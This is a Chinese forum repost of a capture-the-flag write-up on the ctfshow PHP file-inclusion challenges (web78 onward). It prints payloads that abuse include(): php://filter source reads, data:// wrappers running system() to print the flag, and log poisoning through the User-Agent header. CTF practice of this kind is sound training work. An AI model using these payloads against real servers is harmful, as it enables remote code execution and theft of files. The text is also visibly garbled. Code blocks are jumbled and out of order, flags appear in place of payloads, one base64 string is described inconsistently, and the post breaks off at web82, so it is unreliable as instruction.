qidao123.com ToB IT社区-企服评测·应用市场»论坛 虚拟化.超融合.云计算 公有云 SAAS ctfshow-web文件包罗(web78-web86)

ctfshow-web文件包罗(web78-web86)

[复制链接]
发表于 2026-1-8 14:57:20 | 显示全部楼层 |阅读模式
ctfshow-web文件包罗

web78
  1. [/code][align=center][img]https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzYyMTU1Ny8yMDI2MDEvMzYyMTU1Ny0yMDI2MDEwODE2MDkzNDI4NC0xMTUzOTEzNjExLnBuZw==[/img][/align]
  2. [align=center][img]https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzYyMTU1Ny8yMDI2MDEvMzYyMTU1Ny0yMDI2MDEwODE2MDkzNDY4Mi03NTk4MjYwMjUucG5n[/img][/align]
  3. [size=3]方法三:data协议[/size]
  5. data也是利用文件包罗弊端,将输入的代码看成php文件实行。
  6. data协议格式:
  7. [code]?file=php://filter/read=convert.base64-encode/resource=flag.php
复制代码
构造payload:
  1. ctfshow{d03c9148-23af-48a1-92e1-ad011f98d415}
复制代码
将我们输入的看成php文件来实行,以到达读取flag的目标。

web79
  1. 可以用代替
  2. flag.php可以用*或?代替部分字符</p>或是直接利用base64编码
  3. [code]ctfshow{d03c9148-23af-48a1-92e1-ad011f98d415}?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhKicpOyA/Pg==PD9waHAgc3lzdGVtKCd0YWMgZmxhKicpOyA/Pg==即是
复制代码
当你利用hackbar的时间,请利用raw模式发送post哀求,否则服务端无法吸收到post里的内容。
日记包罗
  1. data://[<MIME-type>][;charset=<encoding>][;base64],<data>
复制代码
user-agent里写上
  1. [/code][align=center][img]https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzYyMTU1Ny8yMDI2MDEvMzYyMTU1Ny0yMDI2MDEwODE2MDkzNTgzMi02NTc5MzcxNi5wbmc=[/img][/align]
  2. [size=4]web80[/size]
  4. [code]
复制代码

发现有fl0g.php
  1. [/code][align=center][img]https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzYyMTU1Ny8yMDI2MDEvMzYyMTU1Ny0yMDI2MDEwODE2MDkzNzAwMi0xNjY2MDMyNTMxLnBuZw==[/img][/align]
  2. [code]?file=data://text/plain,<?= system("tac fla*") ?>
  3. ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhKicpOyA/Pg==
  5. PD9waHAgc3lzdGVtKCd0YWMgZmxhKicpOyA/Pg==等于<?php system('cat flag.php');
复制代码
wbe81
  1. ctfshow{e37fa4f8-13aa-40d3-a57e-dd2af3f4030e}
复制代码
发现比力上一题多了:绕过,我们还是可以利用日记包罗
  1. data://[<MIME-type>][;charset=<encoding>][;base64],<data>
复制代码
User-Agent
  1. [/code][align=center][img]https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzYyMTU1Ny8yMDI2MDEvMzYyMTU1Ny0yMDI2MDEwODE2MDkzNzI5OC0xNjE1NzUyNzExLnBuZw==[/img][/align]
  2. 发现存在fl0g.php,直接读取
  3. [code]
复制代码
  1. <?php
  3. /*
  4. # -*- coding: utf-8 -*-
  5. # @Author: h1xa
  6. # @Date:   2020-09-16 11:25:09
  7. # @Last Modified by:   h1xa
  8. # @Last Modified time: 2020-09-16 11:26:29
  9. # @email: h1xa@ctfer.com
  10. # @link: https://ctfer.com
  12. */
  15. if(isset($_GET['file'])){
  16.     $file = $_GET['file'];
  17.     $file = str_replace("php", "???", $file);
  18.     $file = str_replace("data", "???", $file);
  19.     include($file);
  20. }else{
  21.     highlight_file(__FILE__);
  22. }
复制代码
web82

session特性与条件竞争

利用PHP_SESSION_UPLOAD_PROGRESS举行文件包罗 - NPFS - 博客园
[code]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

返回列表

万万哇
+ 我要发帖

登录后关闭弹窗

登录参与点评抽奖  加入IT实名职场社区
去登录
快速回复 返回顶部 返回列表